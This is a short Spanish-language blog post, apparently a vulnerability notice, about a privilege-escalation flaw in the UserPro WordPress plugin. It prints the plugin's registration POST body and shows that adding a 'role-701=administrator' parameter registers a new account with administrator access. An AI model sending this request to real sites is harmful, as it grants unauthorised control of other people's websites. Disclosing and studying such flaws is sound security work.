UserPro 4.9.21 User Registration With Administrator Role

La gestión de usuarios y perfiles en WordPress es importante, y por ello existe el plugin UserPro, fuera del repositorio, y que ha corregido una vulnerabilidad grave de acceso de privilegios de administrador.

Aunque la vulnerabilidad está en versiones anteriores a la 4.9.21 y corregida en la 4.9.29, solo se tenía indicación de que se había corregido una validación del rol administrador.

El caso es que si vas al formulario de registro se genera cierta información al rellenarlo con datos, algo del estilo a:

redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701= USERNAME@EMAIL.COM &user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx

Si a este código, se le añade el rol de administrador,

role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx

Te permitiría que, posteriormente, puedas acceder al panel de administración como tal.

Deja un comentario